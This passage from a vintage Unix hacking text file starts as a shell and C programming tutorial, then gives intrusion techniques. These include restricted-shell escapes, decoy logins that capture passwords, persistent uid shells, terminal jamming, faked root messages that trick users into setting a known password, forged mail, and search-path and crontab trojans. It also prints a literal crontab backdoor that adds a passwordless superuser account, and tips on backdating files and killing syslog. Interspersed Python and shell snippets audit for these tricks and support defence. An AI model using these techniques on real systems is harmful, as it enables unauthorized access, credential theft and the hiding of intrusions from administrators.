use numerical arguments. You could just as easily have assigned loopvar a
string value:

for loopvar in apples peaches pears
do echo "This pass's fruit is:"
echo $loopvar
done

Note that you can also specify multiple commands to be carried out in the
do portion of the loop.

SELECTIVE EXECUTION WITH CASE
-----------------------------
	The case command allows you to execute commands based on the value
of a variable (preceded by a dollar sign, as in the example below). The
format is:

case [variable] in
	[value]) commands
		commands
		commands;;
	[value2]) commands
		commands;;
	[value3]) ...and so on
esac

For example:

case $choice in
	1) echo "You have chosen option one."
		echo "This is not a good choice.";;

	2) echo "Option 2 is a good choice.";;

	*) echo "Invalid option.";;
esac

Now, to explain that:
	If the variable choice's value is "1", the commands in the section
for the value 1 are carried out until a pair of semicolons (";;") is
found. The same if the value of choice is "2". Now, note the last entry,
"*". This is a wildcard character. This means to execute the commands in
this section for any other value of choice. esac signals the end of the
list of execution options for case.

DETERMINING TRUE/FALSE CONDITIONS WITH TEST
-------------------------------------------
	The test command tests for various conditions of files and
variables and returns either a true value (0) or a false value (1), which
is used in conjunction with the if/then statements to determine whether or
not a series of commands are executed. There are several different formats
for test, depending on what kind of condition you are testing for. When
using variables with test, you must always precede the variable with a
dollar sign.

NUMERIC TESTS
-------------
Format:
test [arg1] option [arg2]

The arguments can either be numbers or variables.

OPTION   TESTS TRUE IF
------   -------------
-eq      arg1 = arg2
-ne      arg1 <> arg2
-gt      arg1 > arg2
-lt      arg1 < arg2
-ge      arg1 >= arg2
-le      arg1 <= arg2

FILETYPE TESTS
--------------
Format:
test [option] file or directory name

OPTION   TESTS TRUE IF
------   -------------
-s       file or directory exists and is not empty
-f       the "file" is a file and not a directory
-d       the "file" is really a directory
-w       the user has write permission to the file/directory
-r       the user has read permission to the file/directory

CHARACTER STRING TESTS
----------------------
Format:
test [arg1] option [arg2]
The arguments can be either strings of characters or variables with
character string values.

OPTION   TESTS TRUE IF
------   -------------
=        arg1 = arg2
!=       arg1 <> arg2

A note here about string tests. You must enclose the variables in quotation
marks (like "$arg1") if you wish the test to take spaces into
consideration; otherwise the shell strips leading and trailing spaces
before test ever sees the value, and " blue" would be considered the same
as "blue". (An unquoted variable that is empty disappears from the command
line altogether, and test then complains about a missing argument.)

TESTING FOR THE EXISTENCE OF A STRING OF CHARACTERS
---------------------------------------------------
Format:
test [option] arg
Arg is a variable.

OPTION   TESTS TRUE IF
------   -------------
-z       variable has a length of 0
-n       variable has a length greater than 0

COMBINING TESTS WITH -A AND -O
------------------------------
	These options stand for "and" (-a) and "or" (-o). They allow you
to combine tests, for example:

test "$arg1" = "$arg2" -o "$arg1" = "$arg3"

means that a true condition is returned if arg1=arg2 or arg1=arg3.

CONDITIONAL EXECUTION WITH IF/THEN/ELSE/ELIF
--------------------------------------------
Format:
if [this condition is true]
then [do these commands]
fi

Example:

if test "$arg1" = "$arg2"
then echo "argument 1 is the same as argument 2"
fi

This is pretty much self-explanatory. If the condition test on the if line
returns a true value, then the commands following "then" are carried out
until the fi statement is encountered.

Format:
if [this condition is true]
then [do these commands]
else [do these commands]
fi

Again, pretty much self-explanatory. The same as the above, except that if
the condition isn't true, the commands following else are carried out,
until fi is encountered.

Format:
if [this condition is true]
then [do these commands]
elif [this condition is true]
then [do these commands]
fi

The elif command ("else if") executes another condition test if the first
condition test is false, and if the elif's condition test returns a true
value, the commands for its then statement are carried out.

WHILE/DO LOOPS
--------------
Format:
while [this condition is true]
do [do these commands]
done

Repeats the commands following "do" for as long as the condition following
"while" is true. (The loop body is introduced by do, as in for/do, not by
then.) Example:

looper=""
while test "$looper" != "q"
do read looper
echo $looper
done

This will read the value of the variable looper from the keyboard and
display it on the screen, and ends when the value of looper is "q". (looper
is set to an empty string first, and quoted in the test, so that the
comparison works on the first pass before anything has been read.)
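As an added example that is not from the article, here are the case, test, if/elif and while/do constructs above applied to the PATH variable from the SPECIAL SHELL VARIABLES section: the function reports the blank and "." entries that mean the current directory, relative entries, directories that do not exist, and directories anyone can write to. The path string is an argument, so it is checked here against a constructed temporary tree; the function names are mine.

```shell
#!/bin/sh
# Added example (not from the article): audit a search path string with the
# Bourne shell constructs described above. Pass "$PATH" to check your own.

# other_writable DIR: true when the "other" write bit is set. The ninth
# character of "ls -ld" output is that bit ("drwxr-xrwx" -> 'w'), which a
# case pattern of eight ?'s followed by w picks out.
other_writable() {
    case "$(ls -ld "$1")" in
    ????????w*) return 0 ;;
    *) return 1 ;;
    esac
}

# check_path PATHSTRING
# Prints "entry<TAB>problem" for each questionable entry. A blank or "."
# entry means the current directory, exactly as the article's examples
# ".:/bin:/usr/bin", ":/bin:/usr/bin" and "/bin:/usr/bin:" do.
check_path() {
    # Turn the colon-separated list into one entry per line and walk it
    # with a while/do loop and read; empty fields survive as empty lines.
    printf '%s\n' "$1" | tr ':' '\n' | while read -r entry
    do
        case "$entry" in
        ''|.)
            printf '%s\t%s\n' "${entry:-(empty)}" \
                "current directory is in the search path" ;;
        /*)
            if test ! -d "$entry"
            then printf '%s\t%s\n' "$entry" "directory does not exist"
            elif other_writable "$entry"
            then printf '%s\t%s\n' "$entry" "directory is writable by everyone"
            fi ;;
        *)
            printf '%s\t%s\n' "$entry" \
                "relative entry (resolved against the current directory)" ;;
        esac
    done
}

# path_is_clean PATHSTRING: exit status 0 when check_path reports nothing,
# so it can be used directly as an if/then condition.
path_is_clean() {
    test "$(check_path "$1" | wc -l | tr -d ' ')" -eq 0
}

# Constructed fixture (not a real system): a temporary tree with a normal
# directory and a world-writable one. Prints the directory name.
path_fixture() {
    d=$(mktemp -d)
    mkdir "$d/ok" "$d/ww"
    chmod 755 "$d/ok"
    chmod 777 "$d/ww"
    printf '%s' "$d"
}

tree=$(path_fixture)
check_path ".:$tree/ok:$tree/ww:$tree/missing:"
```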

SUMMARY
-------
	This small tutorial is by no means a complete guide to shell
programming. Look at shell scripts on the systems you crack and follow
their examples. Remember that you can accomplish a great deal by combining
the various control structures (such as having an if/then conditional
structure call up a while/do loop if the condition is true, etc.) and by
using I/O redirection, pipes, etc. My next Unix file will cover more
advanced shell programming, and examine shell programming on another
popular shell, the Berkeley C shell.

THE C COMPILER
--------------
	C is sort of the "official" language of Unix. Most of the Unix
operating system was written in C, and just about every system I've ever
been on had the C compiler. The command to invoke the C compiler is cc.
The format is "cc [filename]", where filename is the name of the file
which contains the source code. (The filename must end in .c) You can
create the source code file with any of the system's text editors. The
include files, stdio.h and others, are kept in a directory on the system.
You do not have to have a copy of these files in your current directory
when you compile the file; the compiler will search this directory for
them. If you wish to include any files not in the include library, they
must be in your current directory. The compiled output will be a file
called "a.out" in your current directory.

COMPILING INDIVIDUAL MODULES
----------------------------
	If you're working on a very large program, you will probably want
to break it up into small modules. You compile the individual modules with
the -c option, which only generates the object files for the module. Then,
use the link editor to combine and compile the object files. The object
files will be generated with the same name as the source files, but the
file extension will be changed from .c to .o. When you have created all
the object files for all of the modules, combine them with ld (the link
editor) like this:

ld /lib/crt0.o [module] [module]... -lc

which will give you the final, compiled program, in a file named a.out.
For example:

ld /lib/crt0.o part1.o part2.o -lc

You must remember to include the /lib/crt0.o and -lc parts in the command,
in the order shown. Also, the object files must be specified in the ld
command in the order that they must be in the program (for instance, if
part1 called part2, part2 can't be BEFORE part1).

CHECKING FOR ERRORS IN C PROGRAMS
---------------------------------
	The lint command checks for errors and incompatibilities in C source
code. Type "lint [c source-code file]". Not all of the messages returned by
lint are errors which will prevent the program from compiling or executing
properly; it will also report lines of code which may not be portable to
other Unix systems, unused variables, etc.

C BEAUTIFIER
------------
	The cb (C beautifier) program formats C source code in an easy to
read, "pretty" style. The format is "cb [file]". The output is to the
screen, so if you want to put the formatted source code into a file, you
must redirect the output.

SPECIAL C COMMANDS
------------------
	The Unix C library has a function called system that executes Unix
commands and programs as if you had typed in the commands from the
keyboard. The format is:

system("command line")

where command line is any command line you can execute from the shell,
such as:

system("cat /etc/passwd")

Another function which performs a similar job is execvp, which replaces
the running program with the one named (searching the PATH the way the
shell does) instead of returning when it finishes. The format is:

execvp("command", argv)

where argv is an array of argument strings, beginning with the command
name and ending with a NULL pointer. An interesting trick is to execute a
shell program using execvp. This will make the program function as a
shell.

HACKING THE UNIX SYSTEM
-----------------------
	This is it, kiddies, the one you've waded through all that rodent
nonsense for! This section will describe advanced hacking techniques. Most
of these techniques are methods of defeating internal security (i.e.
security once you're actually inside the system). There is little to be
said on the subject of hacking into the system itself that hasn't already
been said in the earlier sections on logging in, Unix accounts, and Unix
passwords. I will say this much- it's easier, and faster, to password hack
your way from outside the system into a user account. Once you're actually
inside the system, you will find it, using the techniques described in
this section, almost easy to gain superuser access on most systems. (Not
to mention that nothing is quite as rewarding as spending 3 days hacking
the root account on a system, only to receive the message "not on
console-disconnecting" when you finally find the proper password.) If you
do not have a good understanding of the Unix operating system and some of
its more important utilities already, you should read the earlier parts of
this file before going on to this section.

OVERCOMING RSH RESTRICTIONS
---------------------------
	The rsh (restricted Bourne shell) attempts to limit the commands
available to a user by preventing him from executing commands outside of
his search path, and preventing him from changing directories. It also
prevents you from changing the value of shell variables directly (i.e.
typing "variable=value"). There are some easy ways to overcome these
restrictions.
	You can reference any file and directory in the system by simply
using its full pathname. You can't change directories like this, or
execute a file that is outside of your search path, but you can do such
things as list out the contents of directories, edit files in other
directories, etc. (if you have access to the necessary commands).
	The biggest flaw in rsh security is that the restrictions described
above are ignored when the account's profile file is executed upon logon.
This means that, if you have access to the edit command, or some other
means of modifying your account's profile, you can add a line to add a
directory to your search path, thereby letting you execute any programs in
that directory. The restriction on changing directories is also ignored
during logon execution of the profile. So, if you absolutely, positively
HAVE to go to another directory, you can add a cd command to your .profile
file.

OVERCOMING COPY AND WRITE RESTRICTIONS
--------------------------------------
	This is a simple trick. If you have read access to a file, but
cannot copy it because of directory protections, simply redirect the
output of the cat command into another file. If you have write access to a
directory but not write access to a specific file, you can create a copy
of the file, modify it (since it will be owned by your account), delete
the original, and rename the copy to the name of the original.

DETACHED ACCOUNTS
-----------------
	This is a big security hole in many Unix systems. Occasionally, if
a user is disconnected without logging off, his account may remain
on-line, and still attached to the tty he was connected to the system
through. Now, if someone calls the system and gets connected to that tty,
he is automatically inside the system, inside the disconnected user's
account. There are some interesting ways to take advantage of this flaw.
For instance, if you desire to gain the passwords to more accounts, you
can set a decoy program up to fake the login sequence, execute the
program, and then disconnect from the system. Soon, some unlucky user will
call the system and be switched into the detached account's tty. When they
enter their username and password, the decoy will store their input in a
file on the system, display the message "login incorrect", and then kill
the detached account's shell process, thus placing the user at the real
login prompt. A Unix decoy written by Shooting Shark will be given at the
end of this file.

UID SHELLS
----------
	When the uid bit is set on a shell program, executing this shell
will change your user id to the user id of the account that owns the shell
file, and you will have full use of that account, until you press
control-d (ending the second shell process) and return to your normal user
id. This gives you the power to execute any commands under that account's
user id. This is better than knowing the account's password, since as long
as the file remains on the system, you can continue to make use of that
account, even if the password is changed. When I gain control of an
account, I usually make a copy of the shell while logged in under that
account in a nice, out of the way directory, and set its uid and gid bits.
That way, if I should happen to lose the account (for instance, if the
password were changed), I could log in under another account and still
make use of the lost account by executing the uid shell.

FORCED DETACHING
----------------
	This is an easy means of gaining the use of an account on systems
with the detached account flaw. Usually, most terminal device files will
have public write permission, so that the user that logs in under it can
receive messages via write (unless he turns off messages with the mesg n
command). This means that you can cat a file into the user's terminal
device file. A compiled file, full of all kinds of strange control
characters and garbage, works nicely. Say, the user is logged in on tty03.
Just type cat /bin/sh > /dev/tty03. The user will see something like this
on his screen:

LKYD;uiayh;fjahfasnf kajbg;aev;iuaeb/vkjeb/kgjebg;iwurghjiugj;di vd
b/fujhf;shf;j;kajbv;jfa;vdblwituwoet8y6-
2958ybp959vqvq43p8ytpgyeerv98tyq438pt634956b v856 -868vcf-56-
e8w9v6bc[6[b6r8wpcvt

Hehehe! Now, the poor devil is confused. He tries to press break- no
response, and the garbage just keeps coming. He tries to enter various
commands, to no avail. Catting a file into his terminal device file "ties
it up", so to speak, and since this is the file through which all I/O
with his terminal is done, he finds it almost impossible to get any input
through to the shell. He can't even log off! So, in desperation, he
disconnects... It is best to execute the cat command as a background
process, so that you can keep an eye on the users on the system. Usually,
the user will call the system back and, unless he gets switched back into
his old detached account (in which case he will usually hang up again), he
will kill the detached account's login process. So, if you see 2 users on
the system using the same username, you know he's logged back in already.
Anyways...after an appropriate length of time, when you feel that he's
disconnected, log off and call the system back a few times until you get
switched into the detached account. Then just create a uid shell owned by
the account and you can use it any time you please, even though you don't
know the password. Just remember one thing, though- when the cat command
has finished displaying the compiled file on the victim's screen, if he is
still logged on to that terminal, he will regain control. Use a long
file!

FAKING WRITE MESSAGES
---------------------
	Being able to write to other people's terminal files also makes it
possible to fake write messages from any user on the system. For example,
you wish to fake a message from root. Edit a file to contain these lines:

Message from root console ^g [note control-g (bell) character]
Bill, change your password to "commie" before logging off today. There
has been a security leak.
<EOF> [don't forget to put this-<EOF>-in the file.]

Now, type "who" to find bill's tty device, and type:

cat [filename] > /dev/ttyxx

Bill will see:

Message from root console [beep!]
Bill, change your password to "commie" before logging off today. There
has been a security leak.
<EOF>

WHEN FILE PERMISSIONS ARE CHECKED
---------------------------------
	Unix checks file permissions every time you issue a write or
execute command to a file. It only checks read permissions, however, when
you first issue the read command. For instance, if you issued the command
to cat the contents of a file, and someone changed the file's permissions
so that you did not have read permission while the process was still being
executed, the cat command would continue as normal.

ONLINE TERMINAL READING
-----------------------
	If you have some means of assuming an account's user id (such as
having a uid shell for that account), you can also read the contents of
someone's terminal on-line. Just execute the uid shell and type "cat
/dev/ttyxx &" (which will execute the cat command in the background, which
will still display the contents to your screen, but will also allow you to
enter commands). Once the person logs off, ownership of his terminal
device file will revert to root (terminal device files are temporarily
owned by the account logged in under them), but since you had the proper
permissions when you started the read process, you can still continue to
view the contents of that terminal file, and can watch, online, as the
next user logs in. There is also one other trick that can sometimes be
used to gain the root password, but it should be exercised as a last
resort, since it involves revealing your identity as a hacker to the
superuser. On many systems, the superuser also has a normal user account
that he uses for personal business, and only uses the root account for
system management purposes. (This is, actually, a rather smart security
move, as it lessens the chances of, say, things like his executing a
trojan horse program while under the root account, which, to say the
least, could be disastrous [from his point of view].) If you can obtain a
uid shell for his user account, simply execute a read process of his
terminal file in the background (while under the uid shell), and then
drop back into your normal shell. Then send him a write message like:

I'm going to format your winchesters

When he uses the su command to go to the superuser account to kick you
off the system, you can sit back and watch him type in the root password.
(This should only be done if you have more than one account on the
system- remember, many systems will not let you log into a superuser
account remotely, and if the only account you have is a superuser account,
you are effectively locked out of the system.)

MAIL FRAUD
----------
	The TCP/IP protocol is a common protocol for file transfers
between Unix systems, and between Unix and other operating systems. If the
Unix system you are on features TCP/IP file transfers, it will have the
telnet program on-line, usually in the directory /bin. This can be used to
fake mail from any user on the system. Type "telnet" to execute the telnet
program. You should see:

Telnet>

At this prompt, type "open [name] 25", where name is the uucp network
name of the system you are on. This will connect you to the system's 25th
port, used to receive network mail. Once connected, type:

rcpt to: [username]

where username is the name of the user you wish to send mail to. Next,
type:

mail from: [user]

where user is the name of the user you wish the mail to appear from. You
can also specify a non-existent user. You can also fake network mail from
a user on another system. For information on the format of the address,
see the section on the uucp facilities. Then type:

data

You will be prompted to enter the message. Enter "." on a blank line to
end and send the mail. When you've finished sending mail, type "quit" to
exit.

	Thanks to Kid&CO. from Private Sector/2600 Magazine for that novel
bit of information.

UNIX TROJAN HORSES
------------------
	This is an old, OLD subject, and there's little original material to add about it. Trojan horses are programs that appear to execute one function, but actually perform another. This is perhaps the most common means of hacking Unix.
	One of the easiest means of setting up a Unix trojan horse is to place a program named after a system command, such as ls, "in the way" of someone's search path. For instance, if a user's search path is ".:/usr/bin", which means that the system searches the user's current directory for a command first, you could place a shell script in the user's home directory called "ls" that, when executed, creates a copy of the shell, sets the new shell file's uid and gid bits, echoes an error message (such as "lsa: not found", leading the user to think he mistyped the command and the offending character was not echoed, due to line noise or whatever), and deletes itself. When the user executes the ls command in his directory, the uid shell is created. Another good idea is to set the name of the trojan to a command in the user's login file, have it make the uid shell, execute the real command, and then delete itself.
	Another good way to set up a trojan horse is to include a few lines in a user's login file. Simply look at the user's password file entry to find out which shell he logs in under, and then modify the appropriate login file (or create one if it doesn't exist) to create a uid shell when the user logs on.
	If you can modify a user's file in the directory /usr/spool/cron/crontabs, you can add an entry to create a uid shell. Just specify * * * * * as the times, and wait about 1-2 minutes. In 1 minute, the cron utility will execute the commands in the user's crontab file. Then you can delete the entry. Again, if the user doesn't have a file in /usr/spool/cron/crontabs, you can create one.
	One last note: be sure you give the trojan horse execute permissions, otherwise the victim will receive the message "[filename]- cannot execute"... Kind of a dead giveaway.

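
The search-path problem described above has a straightforward administrative check. The following is an added example, not part of the zine: a Python audit of a PATH string that flags the entries a planted "ls" could hide in. The sample path ".:/usr/bin" is the one quoted in the text; the world-writable directory is a constructed temporary one, so the script runs anywhere without touching a real account's PATH.

```python
import os
import stat
import tempfile

# Constructed example: the search path quoted in the text, with "." searched first.
EXAMPLE_PATH = ".:/usr/bin"


def path_entry_risks(path_string):
    """Return (entry, reason) pairs for search-path entries that would let a
    planted file named after a command (the "ls" in the text) be run instead
    of the real one. Entries that do not exist are skipped: nothing runs from them.
    """
    risks = []
    for entry in path_string.split(":"):
        if entry in ("", "."):
            # An empty entry means the current directory on most shells.
            risks.append((entry, "current directory is searched"))
        elif not os.path.isabs(entry):
            risks.append((entry, "relative entry, depends on the current directory"))
        elif os.path.isdir(entry):
            mode = os.stat(entry).st_mode
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                risks.append((entry, "directory writable by group or others"))
    return risks


def demo():
    """Run the check on the text's ".:/usr/bin" plus a world-writable directory
    constructed here, so the example runs on any Unix without touching a real PATH."""
    with tempfile.TemporaryDirectory() as tmp:
        os.chmod(tmp, 0o777)
        return path_entry_risks(EXAMPLE_PATH + ":" + tmp)
```

Running `demo()` reports the "." entry and the writable directory; a clean path such as "/bin:/usr/bin" on a normally installed system returns an empty list. The same check applies to login files: a directory that other users can write to is as dangerous in PATH as "." is.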
CHANGING UID PROGRAMS
---------------------
	If you have write access to a uid file, you can easily modify it to become a shell. First, copy the file. Then type:

cat /bin/sh > [uid file]

This will replace the file's contents with a shell program, but the uid bit will remain set. Then execute the file and create a well-hidden uid shell, and replace the subverted uid file with the copy.
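
The condition this section relies on (a set-uid file that someone other than its owner can write) is what an administrator audits for. As an added example that is not part of the original article, here is a Python scan that walks a directory tree and lists set-uid or set-gid regular files whose mode allows group or world write. The demo fixture is constructed: two scripts in a temporary directory, one with safe 4755 permissions and one with 4777.

```python
import os
import stat
import tempfile


def writable_setuid_files(root):
    """Walk `root` and return paths of set-uid (or set-gid) regular files that
    group or others may write to. Overwriting such a file changes the program
    while the privilege bits stay set, which is the condition the text describes."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks planted in the tree
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            privileged = st.st_mode & (stat.S_ISUID | stat.S_ISGID)
            writable = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
            if privileged and writable:
                found.append(path)
    return sorted(found)


def demo():
    """Constructed fixture: one set-uid file with 4755 and one with 4777.
    Only the second should be reported."""
    with tempfile.TemporaryDirectory() as tmp:
        safe = os.path.join(tmp, "safe_tool")
        risky = os.path.join(tmp, "risky_tool")
        for p in (safe, risky):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\n")
        os.chmod(safe, 0o4755)
        os.chmod(risky, 0o4777)
        return [os.path.basename(p) for p in writable_setuid_files(tmp)]
```

On a real system you would run `writable_setuid_files("/")` as root and expect an empty list; anything it returns is either a packaging mistake or the residue of the trick above.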

ADDING AN ACCOUNT TO A UNIX SYSTEM
----------------------------------
	To add an account to a Unix system, you must have write access to the password file, or access to the root account so that you can change the password file's protections. To add an account, simply edit the file with the text file editor, edit (or any of the other Unix editors, if you wish). Add an entry like this:

[username]::[user#]:[group#]:[description]:[home directory]:[pathname of shell]

Notice that the password field is left blank. To set the password, type:

passwd [username]

You will then be prompted to enter and verify a password for the account. If you wish the account to have superuser privileges, it must have a user number of zero.

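
The two facts in this section (an empty second field means no password, and user number zero means superuser) are exactly what a password-file audit looks for. The following is an added example, not code from the article: a parser for the seven-field format shown above and an audit that reports both conditions. The sample file is constructed; its two "prop" entries mirror the accounts the backdoor section's crontab adds.

```python
# Constructed sample in the seven-field format the text describes.
SAMPLE_PASSWD = """\
root:x:0:0:superuser:/:/bin/sh
uucp:x:5:5:uucp admin:/usr/lib/uucp:/usr/lib/uucp/uucico
alice:x:201:20:Alice:/usr/alice:/bin/sh
prop::1:1::/:/bin/sh
prop2::0:0::/:/bin/sh
"""


def parse_passwd(text):
    """Split password-file text into dicts, one per account."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (lineno, len(fields)))
        name, password, uid, gid, desc, home, shell = fields
        entries.append({"name": name, "password": password, "uid": int(uid),
                        "gid": int(gid), "desc": desc, "home": home, "shell": shell})
    return entries


def audit_passwd(text, expected_root=("root",)):
    """Return (account, reason) findings: accounts that need no password, and
    uid-0 accounts that are not the ones named in `expected_root`."""
    findings = []
    for e in parse_passwd(text):
        if e["password"] == "":
            findings.append((e["name"], "empty password field: no password required"))
        if e["uid"] == 0 and e["name"] not in expected_root:
            findings.append((e["name"], "uid 0: superuser privileges under another name"))
    return findings
```

Run against the sample, the audit names "prop" once (no password) and "prop2" twice (no password, and uid 0). Comparing today's findings with yesterday's is the simplest way to notice an account that appears at 1 am and vanishes at 2 am.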
UNIX BACKDOOR
-------------
	A backdoor is a means of bypassing a system's normal security for keeping unauthorized users out. For all the talk about back doors, they are rarely accomplished. But creating a backdoor in Unix System V is really quite easy. It simply requires adding a few entries to the file /usr/lib/crontab or /usr/spool/cron/crontabs/root. (Again, if the file doesn't exist, you can create it.) Add these lines, which will create 2 accounts on the system, one a user account ("prop") and one a superuser account ("prop2"), at 1 am system time every night, and delete them at 2 am every night.

0 1 * * * chmod +w /etc/passwd
1 1 * * * echo "prop::1:1::/:/bin/sh" >> /etc/passwd
2 1 * * * echo "prop2::0:0::/:/bin/sh" >> /etc/passwd
20 1 * * * grep -v "prop*:" /etc/passwd > /usr/spool/uucppublic/.p
0 2 * * * cat /usr/spool/uucppublic/.p > /etc/passwd
10 2 * * * chmod -w /etc/passwd
15 2 * * * rm /usr/spool/uucppublic/.p
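
Both this section and the trojan-horse section above lean on cron, so a review of the crontab files is the natural countermeasure. As an added example (not from the article), here is a Python crontab parser and audit that flags the three patterns those sections use: a job that rewrites or re-permissions an account file, a job scheduled every minute, and a job that stages data in a hidden dot-file. The sample input is the seven lines above plus two constructed ordinary entries for contrast.

```python
import re

# The seven crontab lines from the section above, plus two ordinary constructed
# entries (a uucp housekeeping job and a noisy every-minute job) for contrast.
SAMPLE_CRONTAB = """\
0 1 * * * chmod +w /etc/passwd
1 1 * * * echo "prop::1:1::/:/bin/sh" >> /etc/passwd
2 1 * * * echo "prop2::0:0::/:/bin/sh" >> /etc/passwd
20 1 * * * grep -v "prop*:" /etc/passwd > /usr/spool/uucppublic/.p
0 2 * * * cat /usr/spool/uucppublic/.p > /etc/passwd
10 2 * * * chmod -w /etc/passwd
15 2 * * * rm /usr/spool/uucppublic/.p
30 3 * * * /usr/lib/uucp/uudemon.hour
* * * * * /bin/date >> /tmp/.heartbeat
"""

ACCOUNT_FILES = ("/etc/passwd", "/etc/group", "/etc/shadow")
FILE_COMMANDS = ("chmod", "chown", "rm", "cp", "mv")
CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
HIDDEN_FILE = re.compile(r"/\.[^/\s]+")


def parse_crontab(text):
    """Split crontab text into jobs: five schedule fields, then the command."""
    jobs = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            raise ValueError("line %d is not a crontab entry" % lineno)
        *schedule, command = m.groups()
        jobs.append({"line": lineno, "schedule": tuple(schedule), "command": command.strip()})
    return jobs


def audit_crontab(text):
    """Return (line number, reason) findings for the patterns the backdoor uses."""
    findings = []
    for job in parse_crontab(text):
        cmd = job["command"]
        first_word = cmd.split()[0] if cmd else ""
        if job["schedule"] == ("*", "*", "*", "*", "*"):
            findings.append((job["line"], "runs every minute"))
        if any(f in cmd for f in ACCOUNT_FILES) and (">" in cmd or first_word in FILE_COMMANDS):
            findings.append((job["line"], "touches an account file with a redirect or permission command"))
        if HIDDEN_FILE.search(cmd):
            findings.append((job["line"], "references a hidden (dot) file"))
    return findings
```

Against the sample, lines 1 through 6 are reported for touching /etc/passwd, lines 4, 5, 7 and 9 for hidden files, and line 9 for the every-minute schedule; the uudemon job on line 8 passes. The grep on line 4 only reads the password file, so that finding is a false positive in isolation, but it is part of the chain and worth a look.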

COVERING YOUR TRACKS
--------------------
	Naturally, you want to keep your cover, and not leave any trace that there is a hacker on the system. This section will give you some tips on how to do just that. First of all, the Unix system keeps track of when a file was last modified (see the information on the command ls -l in the section on file and directory protections). You don't want anyone noticing that a file has been tampered with recently, so after screwing around with a file, if at all possible, you should return its last modified date to its previous value using the touch command. The syntax for the touch command is:

touch hhmmMMdd [file]

Where hh is the hour, mm is the minute, MM is the month, and dd is the day. [file] is the name of the file you wish to change the date on.
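
The touch trick only rewrites the modification time. An inode also carries a change time (ctime) that the kernel sets to "now" whenever the file's data or attributes change, including when touch or utime sets the modification time back, and the ordinary file API offers no way to set ctime to a chosen value. A file whose mtime is much older than its ctime is therefore worth a second look. The following is an added example, not part of the article: a Python check for that gap, demonstrated on a constructed temporary file whose mtime is pushed a year into the past.

```python
import os
import tempfile
import time


def mtime_ctime_gap(path):
    """Return (mtime, ctime, ctime - mtime in seconds) for `path`."""
    st = os.stat(path)
    return st.st_mtime, st.st_ctime, st.st_ctime - st.st_mtime


def backdated_mtime(path, tolerance=60):
    """True when the modification time is older than the inode change time by
    more than `tolerance` seconds. A chmod or chown also bumps ctime, so treat
    a hit as a lead to investigate, not as proof."""
    _, _, gap = mtime_ctime_gap(path)
    return gap > tolerance


def demo(years_back=1):
    """Constructed demonstration: create a file, then set its mtime one year
    into the past the way touch with an explicit date would. Returns the
    check's verdict before and after."""
    with tempfile.NamedTemporaryFile(delete=False) as fh:
        fh.write(b"sample\n")
        path = fh.name
    try:
        before = backdated_mtime(path)
        old = time.time() - years_back * 365 * 86400
        os.utime(path, (old, old))   # atime/mtime go back; ctime becomes "now"
        after = backdated_mtime(path)
    finally:
        os.unlink(path)
    return before, after
```

`demo()` returns `(False, True)`: the fresh file looks normal, the back-dated one does not. The same comparison can be run over a whole tree with `os.walk`, or with `find` and `stat -c '%Y %Z'` on systems that have them.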
	What usually gives hackers away are files they create on a system. If you must create files and directories, make use of the hidden files feature. Also, try to hide them in directories that are rarely "ls"'d, such as /usr/spool/lp, /usr/lib/uucp, etc. (in other words, directories whose contents are rarely tampered with).
	Avoid use of the mail facilities, as anyone with the proper access can read the /usr/mail files. If you must send mail to another hacker on the system, write the message into a text file first, and encrypt it. Then mail it to the recipient, who can save the message without the mail header using the w option, and decrypt it.
	Rather than adding additional superuser accounts to a system, I've found it better to add simple user accounts (which don't stand out quite as much) and use a root uid shell (judiciously hidden in a rarely used directory) whenever I need superuser privileges. It's best to use a user account as much as possible, and only go to the superuser account whenever you absolutely need superuser privileges. This may prevent damaging accidents. And be careful when creating a home directory for any accounts you add. I've always found it better to use existing directories, or to add a hidden subdirectory to a little-tampered-with directory.

	Many systems have "watchdog" programs which log off inactive accounts after a certain period of time. These programs usually keep logs of this kind of activity. Avoid sitting on the system doing nothing for long periods of time.
	While using some of the methods described in this file, you may replace a user's file with a modified copy. This copy will be owned by your account and group instead of the account which owned the original. You can change the group back to the original owner's group with the chgrp command, the format of which is:

chgrp [groupname] [file]

And change the owner back to the original with the chown command:

chown [user] [file]

	When you change ownership or group ownership of a file, the uid and gid bits respectively are reset, so you can't copy the shell, set its uid bit, and change its owner to root to gain superuser capabilities.
	Above all, just be careful and watch your step! Unix is a very flexible operating system, and even though it comes equipped with very little in the way of accounting, it is easy to add your own security features to it. If you do something wrong, such as attempting to log in under a superuser account remotely only to see "not on console-goodbye", assume that a note is made of the incident somewhere on the system. Never assume that something [anything!] won't be noticed. And leave the system and its files exactly as you found them. In short, just use a little common sense.
	If you're a real klutz, you can turn off the error logging (if you have root capabilities). I will include information on System V error logging, which most Unix clones will have error logging facilities similar to, and on Berkeley Standard Distribution (BSD) Unix error logging.

BERKELEY (BSD) UNIX ERROR LOGGING
---------------------------------
Type "cat /etc/syslog.pid". This file contains the process number of the syslog (error logging) program. Kill this process, and you stop the error logging. Remember to start the logging process back up after you're through stumbling around.
	If you want to see where the error messages are sent, type:

cat /etc/syslog.config

Entries are in the form:

#file

Such as:

5/etc/errlogfile

The number is the priority of the error, and the file is the file that errors of that priority or higher are logged to. If you see an entry with /dev/console as its log file, watch out! Errors of that priority will result in an error message being displayed on the system console. Sometimes, a list of usernames will follow an entry for error logging. This means that these users will be notified of any priorities of that level or higher.
There are 9 levels of priority to errors, and an estimation of their importance:

9 -Lowly errors. This information is just unimportant junk used to debug small errors in the system operation that usually won't affect its performance. Usually discarded without a glance.

8 -Usually just thrown away. These messages provide information on the system's operation, but nothing particularly useful.

7 -Not greatly important, but stored for informational purposes.

6 -System errors which can be recovered from.

5 -This is the priority generally given to errors caused by hackers: not errors, but important information, such as security violations: bad login and su attempts, attempts to access files without proper permissions, etc.

4 -Errors of higher priority than 6.

3 -Major hardware and software errors.

2 -An error that requires immediate attention...very serious.

